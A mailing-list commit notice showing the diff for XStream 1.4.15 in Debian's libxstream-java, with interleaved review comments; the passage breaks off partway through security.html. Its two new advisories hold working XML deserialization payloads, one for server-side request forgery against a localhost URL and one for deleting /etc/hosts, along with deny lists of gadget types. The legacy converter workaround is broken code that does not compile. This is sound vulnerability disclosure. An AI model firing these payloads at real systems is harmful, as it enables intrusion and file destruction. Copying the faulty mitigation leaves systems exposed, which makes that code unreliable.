[Git][java-team/libxstream-java][upstream] New upstream version 1.4.15

Markus Koschany gitlab at salsa.debian.org
Fri Dec 18 21:35:32 GMT 2020



Markus Koschany pushed to branch upstream at Debian Java Maintainers / libxstream-java


Commits:
aaea7658 by Markus Koschany at 2020-12-18T01:50:56+01:00
New upstream version 1.4.15
- - - - -


22 changed files:

- BUILD.txt
- pom.xml
- settings-template.xml
- xstream-benchmark/pom.xml
- xstream-distribution/pom.xml
- xstream-distribution/src/content/CVE-2020-26217.html
- + xstream-distribution/src/content/CVE-2020-26258.html
- + xstream-distribution/src/content/CVE-2020-26259.html
- xstream-distribution/src/content/changes.html
- xstream-distribution/src/content/download.html
- xstream-distribution/src/content/index.html
- xstream-distribution/src/content/news.html
- xstream-distribution/src/content/security.html
- xstream-distribution/src/content/website.xml
- xstream-hibernate/pom.xml
- xstream-jmh/pom.xml
- xstream/pom.xml
- xstream/src/java/com/thoughtworks/xstream/XStream.java
- xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
- xstream/src/java/com/thoughtworks/xstream/mapper/DefaultMapper.java
- xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java
- xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java


Changes:

=====================================
BUILD.txt
=====================================
@@ -11,7 +11,7 @@ mvn clean install
 Before deploying:
 
 copy settings-template.xml to ~/.m2/settings.xml adding your Sonatype OSSRH
-username and passwords.
+username and passwords and also your GPG key and password.
 
 To deploy (optionally adding sources and javadoc jars):
 mvn deploy


=====================================
pom.xml
=====================================
@@ -14,7 +14,7 @@
   <groupId>com.thoughtworks.xstream</groupId>
   <artifactId>xstream-parent</artifactId>
   <packaging>pom</packaging>
-  <version>1.4.14</version>
+  <version>1.4.15</version>
   <name>XStream Parent</name>
   <url>http://x-stream.github.io</url>
   <description>
@@ -410,12 +410,12 @@
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
       </dependency>
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
         <classifier>tests</classifier>
         <type>test-jar</type>
         <scope>test</scope>
@@ -423,43 +423,43 @@
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
         <classifier>javadoc</classifier>
         <scope>provided</scope>
       </dependency>
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream-hibernate</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
       </dependency>
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream-hibernate</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
         <classifier>javadoc</classifier>
         <scope>provided</scope>
       </dependency>
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream-jmh</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
       </dependency>
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream-jmh</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
         <classifier>javadoc</classifier>
         <scope>provided</scope>
       </dependency>
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream-benchmark</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
       </dependency>
       <dependency>
         <groupId>com.thoughtworks.xstream</groupId>
         <artifactId>xstream-benchmark</artifactId>
-        <version>1.4.14</version>
+        <version>1.4.15</version>
         <classifier>javadoc</classifier>
         <scope>provided</scope>
       </dependency>
@@ -635,6 +635,11 @@
         <artifactId>jaxb-api</artifactId>
         <version>${version.javax.xml.bind.api}</version>
       </dependency>
+      <dependency>
+        <groupId>com.sun.xml.ws</groupId>
+        <artifactId>jaxws-rt</artifactId>
+        <version>${version.javax.xml.ws.jaxws.rt}</version>
+      </dependency>
 
       <dependency>
         <groupId>org.hibernate</groupId>
@@ -844,6 +849,10 @@
           <groupId>org.apache.maven.plugins</groupId>
           <artifactId>maven-gpg-plugin</artifactId>
           <version>${version.plugin.maven.gpg}</version>
+          <configuration>
+            <keyname>${gpg.keyname}</keyname>
+            <passphraseServerId>${gpg.keyname}</passphraseServerId>
+          </configuration>
         </plugin>
         <plugin>
           <groupId>org.apache.maven.plugins</groupId>
@@ -1114,7 +1123,7 @@
     <version.plugin.maven.deploy>2.3</version.plugin.maven.deploy>
     <version.plugin.maven.enforcer>1.4</version.plugin.maven.enforcer>
     <version.plugin.maven.failsafe>2.22.0</version.plugin.maven.failsafe>
-    <version.plugin.maven.gpg>1.4</version.plugin.maven.gpg>
+    <version.plugin.maven.gpg>1.6</version.plugin.maven.gpg>
     <version.plugin.maven.install>2.2</version.plugin.maven.install>
     <version.plugin.maven.jar>2.2</version.plugin.maven.jar>
     <version.plugin.maven.javadoc>2.10</version.plugin.maven.javadoc>
@@ -1142,6 +1151,7 @@
     <version.javax.annotation.api>1.3.2</version.javax.annotation.api>
     <version.javax.inject>2.4.0</version.javax.inject>
     <version.javax.xml.bind.api>2.3.1</version.javax.xml.bind.api>
+    <version.javax.xml.ws.jaxws.rt>2.2</version.javax.xml.ws.jaxws.rt><!-- Java 5 -->
     <version.jmock>1.0.1</version.jmock>
     <version.joda-time>1.6</version.joda-time>
     <version.junit>3.8.1</version.junit>
@@ -1155,7 +1165,7 @@
     <version.org.jdom2>2.0.5</version.org.jdom2>
     <version.org.json>20080701</version.org.json>
     <version.org.openjdk.jmh>1.21</version.org.openjdk.jmh>
-    <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!--  java 6 -->
+    <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- Java 6 -->
     <version.org.slf4j>1.6.1</version.org.slf4j>
     <version.stax>1.2.0</version.stax>
     <version.stax.api>1.0.1</version.stax.api>


=====================================
settings-template.xml
=====================================
@@ -20,6 +20,13 @@
       <id>ossrh-staging</id>
       <username>your-sonatype.org-id</username>
       <password>your-sonatype.org-pwd</password>
-    </server>      
+    </server>
+    <server>
+      <id>${gpg.keyname}</id>
+      <password>your-gpg-key-pwd</password>
+    </server>
   </servers>
+  <properties>
+    <gpg.keyname>your-gpg-keyname</gpg.keyname>
+  </properties>
 </settings>
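Review bot: The added `<server>` entry has the release manager put the GPG key passphrase into `~/.m2/settings.xml` in clear text, and the template gives no hint that it can be protected. A comment such as `<!-- encrypt with "mvn --encrypt-password" (master password in ~/.m2/settings-security.xml); keep this file owner-readable only -->` above the `<password>` line would cover that. Two things should be confirmed before relying on this template. As far as I recall, the maven-gpg-plugin usage page shows the secret in a `<passphrase>` element rather than `<password>`. The Maven settings schema also has no top-level `<properties>` element (properties live under `<profiles><profile>`), so `${gpg.keyname}` in the server `<id>` may not resolve to the same value that `<passphraseServerId>${gpg.keyname}</passphraseServerId>` gets in the pom.xml gpg-plugin hunk.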


=====================================
xstream-benchmark/pom.xml
=====================================
@@ -14,7 +14,7 @@
   <parent>
     <groupId>com.thoughtworks.xstream</groupId>
     <artifactId>xstream-parent</artifactId>
-    <version>1.4.14</version>
+    <version>1.4.15</version>
   </parent>
   <artifactId>xstream-benchmark</artifactId>
   <packaging>jar</packaging>


=====================================
xstream-distribution/pom.xml
=====================================
@@ -14,7 +14,7 @@
   <parent>
     <groupId>com.thoughtworks.xstream</groupId>
     <artifactId>xstream-parent</artifactId>
-    <version>1.4.14</version>
+    <version>1.4.15</version>
   </parent>
   <artifactId>xstream-distribution</artifactId>
   <packaging>pom</packaging>


=====================================
xstream-distribution/src/content/CVE-2020-26217.html
=====================================
@@ -22,7 +22,7 @@
 
 	<p>All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is
 	affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
-	framework</a> with a white list.</p>
+	framework</a> with a whitelist.</p>
 
     <h2 id="description">Description</h2>
 
@@ -109,12 +109,12 @@ xstream.fromXML(xml);
 	input stream.</p>
 
     <h2 id="workaround">Workaround</h2>
-    <p>As recommended, use XStream's security framework to implement a white list for the allowed types.</p>
-    <p>Users of XStream 1.4.13 who want to use XStream default black list can simply add two lines to XStream's setup code:</p>
+    <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
+    <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add two lines to XStream's setup code:</p>
 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
 </pre></div>
-    <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from
+    <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
     scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
     <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>java.lang.Void</em> and <em>void</em>.</p>
 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
@@ -139,8 +139,8 @@ xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventH
 
     <h2 id="credits">Credits</h2>
 
-    <p>Chen L reported the issue to XStream and provided the required information to reproduce it. The issue was found
-    by Zhihong Tian and Hui Lu, both from Guangzhou University.</p>
+    <p>Chen L found and reported the issue to XStream and provided the required information to reproduce it.  He was
+    supported by Zhihong Tian and Hui Lu, both from Guangzhou University.</p>
 
     </body>
  </html>
\ No newline at end of file


=====================================
xstream-distribution/src/content/CVE-2020-26258.html
=====================================
@@ -0,0 +1,115 @@
+<html>
+<!--
+ Copyright (C) 2020 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 24. November 2020 by Joerg Schaible
+ -->
+  <head>
+    <title>CVE-2020-26258</title>
+  </head>
+  <body>
+
+    <h2 id="vulnerability">Vulnerability</h2>
+
+    <p>CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+    from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+    <h2 id="affected_versions">Affected Versions</h2>
+
+	<p>All versions until and including version 1.4.14 are affected running in a Java environment below Java 15, if
+	using the version out of the box.  No user is affected, who followed the recommendation to setup
+	<a href="security.html#framework">XStream's security framework</a> with a whitelist.</p>
+
+    <h2 id="description">Description</h2>
+
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
+	unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
+        <dataHandler>
+          <dataSource class='javax.activation.URLDataSource'>
+            <url>http://localhost:8080/internal/:</url>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <string>test</string>
+  </entry>
+</map>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+    <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+	available only by manipulating the processed input stream.</p>
+
+    <h2 id="workaround">Workaround</h2>
+    <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
+    <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
+    simply add two lines to XStream's setup code:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+    <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup
+    code:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+    <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
+    scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
+    <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>,
+    <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+	<p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
+	know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
+<div class="Source Java"><pre>xstream.registerConverter(new Converter() {
+  public boolean canConvert(Class type) {
+    return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
+        || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
+        || type == java.lang.Void.class || void.class || Proxy.isProxy(type)
+        || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
+  }
+
+  public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+    throw new ConversionException("Unsupported type due to security reasons.");
+  }
+
+  public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
+    throw new ConversionException("Unsupported type due to security reasons.");
+  }
+}, XStream.PRIORITY_LOW);
+</pre></div>
+
+    <h2 id="credits">Credits</h2>
+
+    <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+    </body>
+ </html>
\ No newline at end of file
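Review bot: The converter workaround printed for XStream 1.4.6 and below does not compile. In `canConvert`, `|| void.class ||` is a bare class literal where a boolean is required, and `java.lang.reflect.Proxy` has no `isProxy` method. The line should read `|| type == java.lang.Void.class || type == void.class || Proxy.isProxyClass(type)`. A mitigation that fails to build tends to be dropped rather than fixed, so the snippet should be compiled before it is published; the identical snippet appears in the CVE-2020-26259.html hunk. Separately, the Vulnerability and Description paragraphs say "Server-Side Forgery Request" / "server-side forgery request" where the usual term is Server-Side Request Forgery, and the 1.4.12–1.4.7 `denyTypes(new Class[]{ ... })` line lists `java.lang.ProcessBuilder.class` twice.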


=====================================
xstream-distribution/src/content/CVE-2020-26259.html
=====================================
@@ -0,0 +1,118 @@
+<html>
+<!--
+ Copyright (C) 2020 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 06. December 2020 by Joerg Schaible
+ -->
+  <head>
+    <title>CVE-2020-26259</title>
+  </head>
+  <body>
+
+    <h2 id="vulnerability">Vulnerability</h2>
+
+    <p>CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long
+    as the executing process has sufficient rights.</p>
+
+    <h2 id="affected_versions">Affected Versions</h2>
+
+	<p>All versions until and including version 1.4.14 are affected running in a Java environment containing the JAX-WS
+	runtime, if using the version out of the box.  No user is affected, who followed the recommendation to setup
+	<a href="security.html#framework">XStream's security framework</a> with a whitelist.</p>
+
+    <h2 id="description">Description</h2>
+
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
+	unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
+        <dataHandler>
+          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+            <contentType>text/plain</contentType>
+            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
+              <tempFile>/etc/hosts</tempFile>
+            </is>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <string>test</string>
+  </entry>
+</map>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+    <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing
+	process has sufficient rights only by manipulating the processed input stream.</p>
+
+    <h2 id="workaround">Workaround</h2>
+    <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
+    <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
+    simply add two lines to XStream's setup code:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+    <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup
+    code:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+    <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
+    scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
+    <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>,
+    <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+	<p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
+	know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
+<div class="Source Java"><pre>xstream.registerConverter(new Converter() {
+  public boolean canConvert(Class type) {
+    return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
+        || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
+        || type == java.lang.Void.class || void.class || Proxy.isProxy(type)
+        || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
+  }
+
+  public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+    throw new ConversionException("Unsupported type due to security reasons.");
+  }
+
+  public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
+    throw new ConversionException("Unsupported type due to security reasons.");
+  }
+}, XStream.PRIORITY_LOW);
+</pre></div>
+
+    <h2 id="credits">Credits</h2>
+
+    <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+    </body>
+ </html>
\ No newline at end of file
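Review bot: The Description paragraph here is carried over unchanged from the CVE-2020-26258 page and still says the injected objects "result in a server-side forgery request". That contradicts this advisory's own Vulnerability and Impact sections, which describe arbitrary file deletion. The sentence should end along the lines of `replace or inject objects, that result in the deletion of a file on the local host.` so that anyone triaging from the description alone rates the integrity and availability impact correctly. The Steps to Reproduce and Impact paragraphs also contain the typos "the references file", "know files" and "as log as", which are worth fixing in the same pass.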


=====================================
xstream-distribution/src/content/changes.html
=====================================
@@ -34,6 +34,45 @@
 	<p>Not yet released.</p>
 -->
 
+	<h1 id="1.4.15">1.4.15</h1>
+
+	<p>Released December 13, 2020.</p>
+
+	<p class="highlight">This maintenance release addresses the security vulnerabilities
+	<a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
+	unmarshalling for XStream instances with uninitialized security framework.</p>
+
+	<h2>Minor changes</h2>
+
+	<ul>
+		<li>GHI:#226: XmlFriendlyNameCoder does not accept '9' as valid character in an XML name.</li>
+		<li>GHPR:#228: DefaultMapper should handle IllegalArgumentException thrown by Class.forName().</li>
+	</ul>
+
+	<h2>Stream compatibility</h2>
+
+	<ul>
+		<li>The type jdk.nashorn.internal.objects.NativeString and the internal JAX-WS type ReadAllStream.FileStream
+		are now	part of the default blacklist and the deserialization of XML containing one of the two types will fail.
+		You will have to enable these types by explicit configuration, if you need them.</li>
+	</ul>
+
+	<h2>Delivery</h2>
+
+	<p>Any XStream release can run with a minimal Java runtime environment of Java 1.4 as long as this environment will
+	process only requested classes of the jar file.  Until version 1.4.14 XStream was delivered also as special Java 7
+	version for Android, because Dalvik scans all classes and fails at classes requiring a higher runtime version.  However, this
+	special version will not work in a normal Java 8 environment or higher and was never meant do so.</p>
+
+	<p>Unfortunately, this version has to be build always after the standard version due to the build sequence.  The
+	latest version in Maven Central however is always the one that has been deployed last independently from the time
+	of publishing.  This creates an annoyance now in GitHub for any project using the Dependabot service which creates
+	automated pull requests with updates to the latest XStream version, because it injects now the special Java 7
+	version that probably breaks these projects.</p>
+
+	<p>Users who still require a special version for Java 7 will have to build this artifact now on their own.  Users
+	for even older Java environments had always to do so anyway.</p>
+	
 	<h1 id="1.4.14">1.4.14</h1>
 
 	<p>Released November 16, 2020.</p>
@@ -46,8 +85,8 @@
 
 	<ul>
 		<li>The types java.lang.ProcessBuilder and javax.imageio.ImageIO$ContainsFilter are now part of the default
-		blacklist and the deserialization of XML containing one of the two types will fail. You will must enable these
-		types by	explicit configuration, if you need them.</li>
+		blacklist and the deserialization of XML containing one of the two types will fail. You will have to enable
+		these types by explicit configuration, if you need them.</li>
 	</ul>
 
 	<h1 id="1.4.13">1.4.13</h1>


=====================================
xstream-distribution/src/content/download.html
=====================================
@@ -18,21 +18,19 @@
 
     <p><a href="versioning.html">About XStream version numbers...</a></p>
 
-    <h1 id="stable">Stable Version: <span class="version">1.4.14</span></h1>
+    <h1 id="stable">Stable Version: <span class="version">1.4.15</span></h1>
 
     <ul>
-      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-bin.zip">Binary distribution:</a></b>
+      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-bin.zip">Binary distribution:</a></b>
       Contains the XStream jar files, the Hibernate and Benchmark modules and all the dependencies.</li>
-      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-src.zip">Source distribution:</a></b>
+      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-src.zip">Source distribution:</a></b>
       Contains the complete XStream project as if checked out from the Subversion version tag.</li>
-      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14/xstream-1.4.14.jar">XStream Core only:</a>
+      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.15/xstream-1.4.15.jar">XStream Core only:</a>
       The xstream.jar only as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
-      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.14/xstream-hibernate-1.4.14.jar">XStream Hibernate module:</a></b>
+      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.15/xstream-hibernate-1.4.15.jar">XStream Hibernate module:</a></b>
       The xstream-hibernate.jar as it is downloaded automatically when it is referenced as Maven dependency.</li>
-      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.14/xstream-jmh-1.4.14-app.zip">XStream JMH module:</a></b>
+      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.15/xstream-jmh-1.4.15-app.zip">XStream JMH module:</a></b>
       The xstream-jmh-app.zip as standalone application with start scripts and all required libraries.</li>
-      <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14-java7/xstream-1.4.14-java7.jar">XStream Core for Java 7 only:</a>
-      The xstream.jar only <a href="faq.html#Compatibility_Android">without the Java 8 stuff</a> as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
     </ul>
 
     <h1 id="maven">Maven Central Repository</h1>
@@ -43,7 +41,7 @@
     <div class="Source XML"><pre><dependency>
   <groupId>com.thoughtworks.xstream</groupId>
   <artifactId>xstream</artifactId>
-  <version>1.4.14</version>
+  <version>1.4.15</version>
 </dependency></pre></div>
 
     <h1 id="previous-releases">Previous Releases</h1>


=====================================
xstream-distribution/src/content/index.html
=====================================
@@ -73,16 +73,15 @@
 
     <h1 id="news">Latest News</h1>
 
-    <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2>
+    <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
 
-      <p class="highlight">This maintenance release addresses the security vulnerability
-      <a href="CVE-2020-26217.html">CVE-2020-26217</a>, reported originally as CVE-2017-9805 for Struts' XStream
-      Plugin, an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security
-      framework.</p>
+	<p class="highlight">This maintenance release addresses the security vulnerabilities
+	<a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
+	unmarshalling for XStream instances with uninitialized security framework.</p>
 
-      <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
+	<p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
 
-      <p>Note, the next major release 1.5 will require Java 8.</p>
+	<p>Note, the next major release 1.5 will require Java 8.</p>
 
   </body>
 </html>


=====================================
xstream-distribution/src/content/news.html
=====================================
@@ -16,6 +16,16 @@
 
   <body>
 
+    <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
+
+	<p class="highlight">This maintenance release addresses the security vulnerabilities
+	<a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
+	unmarshalling for XStream instances with uninitialized security framework.</p>
+
+	<p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
+
+	<p>Note, the next major release 1.5 will require Java 8.</p>
+
     <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2>
 
       <p class="highlight">This maintenance release addresses the security vulnerability


=====================================
xstream-distribution/src/content/security.html
=====================================
@@ -29,14 +29,15 @@
   
 	<p>The provided XML data is used by XStream to unmarshal Java objects.  This data can be manipulated by injecting
 	the XML representation of other objects, that were not present at marshalling time.  An attacker could take
-	advantage of this to execute arbitrary code or shell commands in the context of the server running the XStream
-	process.  A concrete case is described in <a href="CVE-2013-7285.html">CVE-2013-7285</a> and
-	<a href="CVE-2020-26217.html">CVE-2020-26217</a>.</p>
+	advantage of this to access private data, delete local files, execute arbitrary code or shell commands in the
+	context of the server running the XStream process.  Concrete cases are described in
+	<a href="CVE-2013-7285.html">CVE-2013-7285</a>, <a href="CVE-2020-26217.html">CVE-2020-26217</a>,
+	<a href="CVE-2020-26258.html">CVE-2020-26258</a>, and <a href="CVE-2020-26259.html">CVE-2020-26259</a>.</p>
  
-	<p>Note that the XML data can be manipulated on different levels.  For example, manipulating values on existing
- 	objects (such as a price value), or breaking the format and causing the XML parser to fail.  The latter case will
- 	raise an exception, but the former case must be handled by validity checks in any application which processes
-    user-supplied XML.  A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
+	<p>Note, that the XML data can be manipulated on different levels.  For example, manipulating values on existing
+ 	objects (such as a price value), accessing private data, or breaking the format and causing the XML parser to fail.
+ 	The latter case will raise an exception, but the former case must be handled by validity checks in any application
+ 	which processes user-supplied XML.  A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
